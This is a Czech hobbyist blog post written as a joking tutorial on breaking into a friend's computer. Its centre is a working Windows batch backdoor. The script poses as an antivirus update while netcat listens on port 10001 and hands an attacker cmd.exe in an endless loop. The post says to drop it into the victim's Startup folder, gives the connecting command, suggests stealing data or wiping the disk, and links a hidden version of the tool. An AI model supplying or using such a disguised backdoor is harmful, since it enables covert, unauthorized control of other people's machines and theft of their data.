„It was as if firewalls were not a phenomenon relegated to the world of computers. He had a firewall himself, and he didn't always know how to get past it.“ Henning Mankell (Firewall)

• Tagy
• Archiv
• O blogu
• Galerie
• Blog
• Knihy

Chcete se nabourat do počítače kamarádovi? Žádný problém!

To opravdu není žádný problém. Chcete to naučit? Přečtěte si článek ... kdo ví, možná z vás bude velký h4xor.

edit: Z odkazu na konci článku byl udělán hypertext.

Má to ale háčkek .... teda háčky:

• Obět nesmí mít zaplej firewall
• Oběť musí mít veřejnou IP adresu (tedy pokud útočíte ze sítě internet)
• Musíte nějakým způsobem dostat do PC oběti jeden soubor
• Oběť musí být přinejmenším slepá jak patrona (bod 4 neplatí v případě mého h4xor toolkitu, který vám nabídnu nakonci)

Na to, že vůbec žádnej h4xor nejsem je těch háčků docela málo ne?

Tak a dáme se do toho ...

Co k tomu potřebujete:

• 0. Základní znalost práce s příkazovou řádkou (cd, format c:, del, rm, hack_all, fuckoff)
• 1. Program NetCat ... nc.exe (nakonci hodim link)
• 2. Počítač na bázi intel x86 (ano, váš počítač je k tomu vhodný i pokud máte amd)
• 3. min 1MB místa na pevném disku
• 4. min 4MB operační paměti
• 5. jídlo a pití (nejlépe kofolu, párky od Antoniho a čerstvý rohlík)
• 6. samozřejmě přípojku k nějaké síti, přes kterou chcete útok provést (intranet,internet)
• 7. měkkou židli, pokud možno na kolečkách nebo hydraulickou z autobusu
• 8. únikovou trasu, v případě návštvěvy federálů

Tyhle věci potřebujete naprosto nutně. Když nemáte, nemůžete hekovat.

Náš útok se bude skládat z cmd scriptu, který vy dostanete do PC oběti a z CMD scriptu, který nám umožní pronikout do PC oběti.

Co je to cmd script? To je dávkový soubor, to samé jako soubor BAT (nebudu vám říkat co je to dávkový soubor, říkal jsem vám snad jasně, že potřebujete základní znalost příkazové řádky.)

Backdoor

backdoor je script, který dostanete do PC oběti. K tomuto scriptu samozřejmě připojíte i program NetCat čili nc.exe, který je nezbytný pro běh skriptu:

• 1. Vytvořte si složku, kam budete svoje heky ukládat
• 2. Pokud to ještě nemáte (jestli ne, nejte pořádný hacker ale lamer), zapněte si zobrazování známých přípon souborů.
• 3. Vytvořte texťák a přejmenujte ho na aktualizace.cmd (nebudeme ho přece nazývat backdoor_DONT_THE_FUCK_TOUCH_THIS_it_is_deadly_hackers_work.cmd).
• 4. Do této složky nakopírujte nc.exe
• 5. Editujte skript takto:

@echo off
cls

:REPLY

echo Aktualizuji váš antivirový program ... čekejte prosím

nc -v -l -p 10001 -e cmd.exe
GOTO REPLY
pause

echo off zajistí aby příkazová řádka nezobrazovala připomínky

cls vymaže obrazovku

echo uvede uživatele v domění, že se mu aktualizuje antivirový program

nc -v -l -p 10001 -e cmd.exe spustí naslouchání na portu 10001 a v případě příchozího toku na tomto portu, předá řízení příkazové řádky čili cmd.exe

pokud se útočník odpojí, bude program naslouchat znova díky nekonečné smyčce.

(představte si že uživatel zapnul PC a protože jste tento skript i s nc.exe nakopíroval do jeho složky 'Po Spuštění', má teď tento skript aktivní)

Mezitím vy:

si připravíte párky a rohlíky a napijete se kofoly.

připravíte si svůj skipt, kterým se napojíte na poslouchající backdoor:

nc -v -n IP_ADRESA_OBETI 10001

IP_ADRESA_OBETI tam samozrejme nepiste, ale napiste tam IP adredu oběti

!!! Spusťte to !!!

Ha, pokud se to povedlo, máte teď v okně příkazové řádky, příkazovou řádku oběti.

HAHAHAHAHAHA
ááááááááá cha cha chááá
muhehehehehe.

teď si můžete s jeho PC dělat co chcete, třeba krást data, formatovat disk ... muhehehe.

---------------------------
---------------------------

Sami jste si asi všimli, že je to trochu nápadné, proto jsem speciálně pro vás naprogramoval prográmek, který bude na pc oběti běžet skrytý a vy nemusíte nic psát. Tady je článek:

[http://mfs-hq.ic.cz/article/xsvr.html]

HAVE FUN PAL !!!

16.07 /2006 - 18:18 Michal Frdlík, programování 23 komentářů (přečteno: 19740x)

Související články:

• 11.12 /2009 - 22:40 - TCP robot Karel
• 11.10 /2009 - 13:21 - Semestrální práce v C++ Jaké téma zvolit?
• 10.09 /2009 - 14:12 - Algorithms (Battleships či Lodě): semestrální práce na ČVUT: FEL: STM
• 27.01 /2009 - 21:55 - Nejčastější výskyt nejdelšího řetězce – LRS
• 20.09 /2008 - 17:49 - GEOrss - najděte zdroje ve svém okolí

Nenechte si ujít

Nejkvalitnější komentář

Zaujal vás tento článek? Nezapomeňte, že je ve vaší moci ukázat stovkám dalších lidí, že tento článek se vám libí. Stačí kliknout na následující tlačítko.

Chcete být upozorňován(a) na nové texty? Pak si přidejte do své RSS čtečky zdroj pro články, bleskovy nebo komentáře a buďte tak informování o všem novém.

Neváhejte napsat k článku komentář (Co je to komentář ?), pokud máte k danému tématu co říci.